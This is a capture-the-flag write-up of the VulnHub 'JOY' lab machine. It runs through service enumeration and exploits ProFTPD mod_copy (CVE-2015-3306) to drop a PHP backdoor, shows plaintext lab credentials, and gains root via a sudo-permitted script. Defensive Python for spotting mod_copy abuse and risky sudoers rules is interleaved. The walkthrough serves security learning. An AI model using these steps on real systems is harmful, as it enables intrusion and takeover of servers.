nmap
nmap -p21,22,25,80,110,139,143,445,465,587,993,995 10.0.2.54 -sC -sV
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-19 02:53 EDT
Nmap scan report for 10.0.2.54 (10.0.2.54)
Host is up (0.00035s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
|_drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0)
25/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2016-07-19 20:03 ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL AUTH-RESP-CODE STLS CAPA TOP UIDL RESP-CODES PIPELINING
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: have more LOGIN-REFERRALS IMAP4rev1 ID OK capabilities SASL-IR LITERAL+ STARTTLS Pre-login post-login LOGINDISABLEDA0001 listed IDLE ENABLE
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
465/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvi
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvi
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:A8:98:92 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: The, JOY.localdomain, JOY; OS: Linux; CPE: cpe:/o:linux:linux_
Host script results:
|_clock-skew: mean: -2h40m03s, deviation: 4h37m06s, median: -4s
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknow
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: joy
| NetBIOS computer name: JOY\x00
| Domain name: \x00
| FQDN: joy
|_ System time: 2021-04-19T14:53:47+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-19T06:53:47
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org
Nmap done: 1 IP address (1 host up) scanned in 42.45 seconds
Enumeration
FTP
ftp 10.0.2.54
Connected to 10.0.2.54.
220 The Good Tech Inc. FTP Server
Name (10.0.2.54:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
226 Transfer complete
ftp> cd dowload
550 dowload: No such file or directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
226 Transfer complete
ftp> cd download
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> cd upload
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x 1 ftp ftp 2514 Apr 19 06:57 directory
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo
-rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado
-rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo
-rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano
-rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho
-rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko
-rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto
-rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno
-rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo
-rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo
-rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder
226 Transfer complete
ftp> cd reminder
550 reminder: No such file or directory
ftp> get reminder
local: reminder remote: reminder
200 PORT command successful
150 Opening BINARY mode data connection for reminder (24 bytes)
226 Transfer complete
24 bytes received in 0.00 secs (49.3421 kB/s)
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
226 Transfer complete
ftp>
strings reminder
Lock down this machine!
Tried LFI, but got no result.
wfuzz -c -w /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt --hc 404 --hh 206 --hw 169 10.0.2.54/ossec/index.php?f==FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.0.2.54/ossec/index.php?f==FUZZ
Total requests: 9514
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 0
Processed Requests: 9514
Filtered Requests: 9514
Requests/sec.: 0
GoBuster
gobuster dir -u http://10.0.2.54/ossec -w /usr/share/dirb/wordlists/big.txt -s 200,301,302 -x html,txt,php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.2.54/ossec
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,php,html
[+] Timeout: 10s
===============================================================
2021/04/19 03:49:44 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 274]
/.htpasswd (Status: 403) [Size: 274]
/.htaccess.html (Status: 403) [Size: 274]
/.htpasswd.html (Status: 403) [Size: 274]
/.htpasswd.txt (Status: 403) [Size: 274]
/.htaccess.txt (Status: 403) [Size: 274]
/.htpasswd.php (Status: 403) [Size: 274]
/.htaccess.php (Status: 403) [Size: 274]
/LICENSE (Status: 200) [Size: 35745]
/README (Status: 200) [Size: 2106]
/css (Status: 301) [Size: 310] [--> http://10.0.2.54/ossec/css/]
/img (Status: 301) [Size: 310] [--> http://10.0.2.54/ossec/img/]
/index.php (Status: 200) [Size: 27180]
/js (Status: 301) [Size: 309] [--> http://10.0.2.54/ossec/js/]
/lib (Status: 301) [Size: 310] [--> http://10.0.2.54/ossec/lib/]
/site (Status: 301) [Size: 311] [--> http://10.0.2.54/ossec/site/]
/tmp (Status: 301) [Size: 310] [--> http://10.0.2.54/ossec/tmp/]
===============================================================
2021/04/19 03:50:02 Finished
===============================================================
smbmap -H 10.0.2.54 --depth 5
[+] Guest session IP: 10.0.2.54:445 Name: 10.0.2.54
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (Samba 4.5.16-Debian)
SNMP Enumeration
┌──(root💀nucleus)-[~/vulnhub/joy]
└─# strings directory
Patrick's Directory
total 184
drwxr-xr-x 18 patrick patrick 4096 Apr 19 16:15 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:40 3FJlDls4dEtazQ0xfGRlahL373aTKA79hxCzFSmBctdm8Pv0MwW1CcVtH3STkbao.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 14:45 4RgCb2HSSwvKyDS6d7Nbd8N16ZN1m76AvP3Dx8bEStOoNrf41t6RmSsYDWmIXGzz.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:30 aXqprGjKEDw7YhU7qmL2o5q7L1IIBO6apF6tCp1DNTD7uLYIfIht4GHWHDS3qOhD.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 14:50 b3hVEDYhrLvmVokhImQzRafdp4XFQO9C9H0LceEBKcYEAzvWHwlVHcQXyxNY4Exh.txt
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:55 cDzTVwEE7ItjX58Yrp6ciXB0yNws8TV8SatOva6Ubna4IWoxJ886fgWv99CECFxh.txt
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
-rw-r--r-- 1 patrick patrick 0 Apr 19 14:50 eajl17pspHujxN7BHLJfUexffGdKWpdC.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:15 EqOhZV9qOwKCAewEt1sNk3VeCJS3UpoJ.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:10 fkktiV49S47Qlzq7e4EOTjDMoh2T8ZST0mupFK9ksrsDx2G7UoyPh95VNnCFdSSj.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 14:40 fvf7EfkpUrtvLhIkDeXoqRyFJwSxvZMe.txt
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:05 gp1mD5FuNzfD1x0nzQqjq4xgBMvDGy5l.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:45 gw345J06tj91I0Yn5KvQSF6YQ5rKL42t.txt
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:20 hkuifdXx4Bi1CWSuVBMSn3jEmv9xMyzHqU97roEYlofa2cvcyzYmXJgoBpNWySTH.txt
-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority
-rw-r--r-- 1 patrick patrick 24 Apr 19 16:15 iEbwg74wdFTd4aBQAt0nQjZpiylcaBhOPwcVp8WU2W2o9KNmMpHZa1qoeyr84Kif.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 16:00 ix28zdyJiIueIJNTfpGTmLt7Cv718f2S.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:40 j7Ql0lCfFrXyN2ItNQoWOwHHYxzbXEaR.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 16:10 KP3pHMZx27IhHmTwXh61Bv1l12J3mQzG.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:25 KVCmIi3bNPzyziDF27vbFeHEGJTitGjW.txt
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:25 ltQgU8xJNc2sHmON7pxIUkRIQtYzFFsqjaAyFkVqyEur1HaT5hjjhErzq7sXNu4h.txt
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:50 mTbIkSA8KMBSQ5E8BNnpF4je9X7abosG.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:55 MThnzqLhRTqmfETsC2dEYNyvns0TpxGn.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:10 NHj9Q1tGF68hFCJ2d6uQDDrXTSA2ZzK2.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:00 NJd9OMvEboHZBMfUdbvVi1fstiW5eaRT.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 16:15 NxdDRCNOwGi0s8zoBYEsFSGjMIehbsuw.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
-rw-r--r-- 1 patrick patrick 0 Apr 19 14:55 Q1aNW83ipJ3rfjfifXWDONZZMNFb9B7c.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 14:40 qdTRNfBg1Avs4grdfgH9k3ILEQuQKvfw33UgeAqJVukIDstGqtxPqGHholOEGqUh.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 14:55 Qki6kcARVQ0tMqgtetT0dqMGaMVZIPWgrNll6KF2uHdCBH8D9jjr2z0t31XtFGDw.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 16:10 RMbphjXFYRRaEctLBR7OfVu0WFJowLKfjgH4xAafOKTVvUBIzzTyTQi8JiqFQ7nf.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:20 Rsdu3Ak75tD6z4s3cEIlfoSAIdOVDY1c.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:05 rwLDEU3aoJtHEL9bmRdM15UIJo2sGMa2hnir5EKX9TLV9NuHGZBdB2kGMKmrGN2J.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:35 S2CIIYvoZLOgYsj9S8VFkKChW38KvzmLa4c6kdHi1zotZTeXoh9Ozcdmrpp4mseG.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 16:00 s7CrzyWgjECN4lyEB2GxsDkSJhZJ0NYHERjRfzekyVTFK5XxmUT2zEJwvDIxYOH1.txt
d--------- 2 root root 4096 Jan 9 2019 script
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:50 TZzQM0akBNDCfyz1tk7JXSYx45P69pxaMn4jr0LjeX2ygFzqZVK7v23gJRK6rC6M.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 14:45 uw8HQthse2QdxWV9xUlUJ6g8sPaPzmqS.txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos
-rw-r--r-- 1 patrick patrick 24 Apr 19 16:05 VmNhOT6FwtyghSRHkDLBkR6kBIR785IXaJYoBi2ZNyjJReIc07P5JcNSS4QwgmZg.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:35 vmybSjbBrxlEA2Nf42dybZX5sbBKooW3.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:45 wk0OlzAcE7m2KIJfp2SoTLPAV1mV8PNMQJzDfERhPV5TQLXOBjyCKK0gxjZuMMrt.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 16:05 WWUWEBStcDwf5PEs4Eo7HG6zevsICKmO.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:15 yFg90qrnGSZtsrk3KtEaiF8BTtciD9f1kbD7twDPeZct6J7bObZWUfzZOoYrfNJl.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:00 YwKHyGrh5a1eV4BnS9iNKvatFz1mzzjFvBap2MQerKBK12tBMSmrGFlyFoy5M7B7.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:30 Zw2UgL4EdNERhzfXbluskOui97fKExWw.txt
You should know where the directory can be accessed.
Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
One thing to notice here is that we have read/write permission on the /upload directory. So maybe we can use the cpfr and cpto commands to copy files from Patrick's home directory to there and then look through them for information.
To do so, connect to FTP using telnet, i.e. telnet IP 21, and use the following:
site cpfr /path-of-file/folder-to-copy
site cpto /path-where-to-copy
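From the server side, the SITE CPFR/CPTO sequence just described is easy to spot once ProFTPD writes an ExtendedLog that includes the full command (%r), and the fix is to unload mod_copy or deny SITE_CPFR/SITE_CPTO in a <Limit> block. The analyser below is an added example, not part of this write-up or of ProFTPD: it assumes the LogFormat named in its docstring, and its log lines are constructed to mirror the copy described above.

```python
"""Detect ProFTPD mod_copy (SITE CPFR/CPTO) activity in an ExtendedLog and
flag copies that leave the FTP root, the pattern in the copy described above.
Assumed LogFormat (an assumption, not the JOY box's config):
    LogFormat copy "%t %a %u \"%r\" %s"
The log lines below are constructed to mirror that copy."""
import posixpath
import re
from collections import namedtuple

Copy = namedtuple("Copy", "client user src dst")
LINE_RE = re.compile(
    r'^\[(?P<time>[^\]]+)\]\s+(?P<client>\S+)\s+(?P<user>\S+)\s+'
    r'"(?P<cmd>[^"]*)"\s+(?P<status>\d{3})\s*$'
)
SAMPLE_LOG = """\
[19/Apr/2021:21:44:01 +0800] 10.0.2.15 anonymous "USER anonymous" 331
[19/Apr/2021:21:44:02 +0800] 10.0.2.15 anonymous "PASS (hidden)" 230
[19/Apr/2021:21:44:05 +0800] 10.0.2.15 anonymous "STOR test" 226
[19/Apr/2021:21:44:10 +0800] 10.0.2.15 anonymous "SITE CPFR /home/ftp/upload/test" 350
[19/Apr/2021:21:44:11 +0800] 10.0.2.15 anonymous "CPTO /home/patrick/script/test" 500
[19/Apr/2021:21:44:12 +0800] 10.0.2.15 anonymous "SITE CPTO /home/patrick/script/test" 250
[19/Apr/2021:21:50:00 +0800] 10.0.2.20 patrick "SITE CPFR /home/ftp/upload/reminder" 350
[19/Apr/2021:21:50:01 +0800] 10.0.2.20 patrick "SITE CPTO /home/ftp/download/../reminder" 250
"""


def inside(path, root):
    """True if the normalised path lies within root (defeats ../ tricks)."""
    norm = posixpath.normpath(path)
    return norm == root or norm.startswith(root.rstrip("/") + "/")


def find_copies(log_text):
    """Pair each accepted SITE CPFR (350) with the next accepted SITE CPTO
    (250) from the same client and user. A rejected CPTO (500) leaves the
    pending source in place, so a retry is still paired with it."""
    pending, copies = {}, []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        parts = m.group("cmd").split(None, 2)
        if len(parts) != 3 or parts[0].upper() != "SITE":
            continue
        verb, arg = parts[1].upper(), parts[2]
        key = (m.group("client"), m.group("user"))
        if verb == "CPFR" and m.group("status") == "350":
            pending[key] = arg
        elif verb == "CPTO" and m.group("status") == "250" and key in pending:
            copies.append(Copy(key[0], key[1], pending.pop(key), arg))
    return copies


def assess(copy, ftp_root="/home/ftp"):
    """Reasons a copy deserves an alert; an empty list means it stayed in bounds."""
    reasons = []
    if copy.user in ("anonymous", "ftp"):
        reasons.append("mod_copy used from an anonymous session")
    if not inside(copy.src, ftp_root):
        reasons.append("source outside FTP root: " + copy.src)
    if not inside(copy.dst, ftp_root):
        reasons.append("destination outside FTP root: " + copy.dst)
    return reasons
```

The second pair in the sample stays inside /home/ftp even with the ../ in it, so only the anonymous copy into /home/patrick/script is reported.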
$ tftp 10.0.2.54 36969
tftp> get version_control
Received 419 bytes in 0.0 seconds
tftp> quit
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
We should switch to OpenSSH and upgrade ProFTPd.
Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
patrick:apollo098765
Exploitation
┌──(root💀nucleus)-[~/vulnhub/joy]
└─ python exploit.py --host 10.0.2.54 --port 21 --path "/var/www/tryingharderisjoy"
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 10.0.2.54:21
[+] Target exploited, acessing shell at http://10.0.2.54/backdoor.php
[+] Running whoami: www-data
[+] Done
https://www.exploit-db.com/exploits/36803
www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls
ls
CONTRIB README.search img lib setup.sh
LICENSE css index.php ossec_conf.php site
README htaccess_def.txt js patricksecretsofjoy tmp
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cd patricksecretsofjoy
cd patricksecretsofjoy
bash: cd: patricksecretsofjoy: Not a directory
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
how would these hack3rs ever find such a page?
find the creds
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
┌──(root💀nucleus)-[~/vulnhub/joy]
└─# echo "/bin/bash" > test
┌──(root💀nucleus)-[~/vulnhub/joy]
└─# ftp 10.0.2.54
Connected to 10.0.2.54.
220 The Good Tech Inc. FTP Server
Name (10.0.2.54:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Apr 19 07:57 upload
226 Transfer complete
ftp> cd upload
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x 1 ftp ftp 16421 Apr 20 07:48 directory
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo
-rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado
-rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo
-rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano
-rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho
-rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko
-rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto
-rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno
-rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo
-rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo
-rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder
-rw-r--r-- 1 ftp ftp 3459 Apr 19 07:57 shell.php
226 Transfer complete
ftp> put test
local: test remote: test
200 PORT command successful
150 Opening BINARY mode data connection for test
226 Transfer complete
10 bytes sent in 0.00 secs (171.3268 kB/s)
ftp> exit
221 Goodbye.
┌──(root💀nucleus)-[~/vulnhub/joy]
└─# telnet 10.0.2.54
Trying 10.0.2.54...
telnet: Unable to connect to remote host: Connection refused
┌──(root💀nucleus)-[~/vulnhub/joy]
└─# telnet 10.0.2.54 21
Trying 10.0.2.54...
Connected to 10.0.2.54.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/upload/test
350 File or directory exists, ready for destination name
cpto /home/patrick/script/test
500 CPTO not understood
site cpto /home/patrick/script/test
250 Copy successful
Privilege Escalation
Created test and, using site cpfr and site cpto, copied the test file to /home/patrick/script/test; running it with sudo gave us root.
patrick@JOY:/var/www/tryingharderisjoy$ sudo -l
Matching Defaults entries for patrick on JOY:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User patrick may run the following commands on JOY:
(ALL) NOPASSWD: /home/patrick/script/test
patrick@JOY:/var/www/tryingharderisjoy$ sudo /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?
../../.What permissions would you like to set the file to?
/^H^H/etc/passwd
Currently changing file permissions, please wait.
chmod: invalid mode: ‘../.././\b\b/etc/passwd’
Try 'chmod --help' for more information.
Tidying up...
7777Done!
patrick@JOY:/var/www/tryingharderisjoy$ ls -al /etc/passwd
-rwxrwxrwx 1 root root 2612 Apr 20 14:21 /etc/passwd
patrick@JOY:/var/www/tryingharderisjoy$
patrick@JOY:/$ sudo /home/patrick/script/test
root@JOY:/#
lol
root@JOY:~# cat proof.txt
Never grant sudo permissions on scripts that perform system functions!
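The rule patrick had (see the sudo -l output above) is exactly what a sudoers audit should catch before anyone reaches the box. The audit below is an added example, not part of the write-up; its sudoers text and ownership map are constructed, since the page shows neither the owner nor the mode of the script, and a real audit would fill that map from os.stat().

```python
"""Audit sudoers rules for the pattern behind the JOY root shell: a NOPASSWD
rule pointing at a script in a user-controlled location. Rule text and the
ownership map are constructed (the write-up shows neither owner nor mode of
the script); a real audit would fill the map from os.stat()."""
import re
import stat

RULE_RE = re.compile(
    r'^(?P<user>[^\s#]+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$'
)
USER_DIRS = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")
INTERPRETERS = ("/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/python")
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
patrick ALL=(ALL) NOPASSWD: /home/patrick/script/test
backup  ALL=(root) /usr/bin/rsync -a /srv/data /mnt/backup
"""
# constructed ownership map: path -> (owner uid, mode); uid 1000 is patrick
SAMPLE_FILES = {
    "/home/patrick/script/test": (1000, 0o775),
    "/usr/bin/rsync": (0, 0o755),
}


def audit_command(cmd, files):
    """Findings for one command entry; a bare 'ALL' is a finding on its own."""
    exe = cmd.split()[0]
    if exe == "ALL":
        return {"all-commands"}
    findings = set()
    if "*" in cmd:
        findings.add("wildcard")
    if exe.startswith(USER_DIRS):
        findings.add("user-controlled-path")
    if exe.startswith(INTERPRETERS):
        findings.add("interpreter")
    info = files.get(exe)
    if info is not None:
        uid, mode = info
        if uid != 0:
            findings.add("not-root-owned")
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.add("writable")
    return findings


def audit_sudoers(text, files):
    """Return {(user, command): findings} for every rule in the sudoers text."""
    report = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        base = {"nopasswd"} if "NOPASSWD" in m.group("tags") else set()
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            report[(m.group("user"), cmd)] = base | audit_command(cmd, files)
    return report
```

Only plain user rules are parsed here; aliases, %group rules and Cmnd_Alias lists need extra handling before this is run against a real /etc/sudoers.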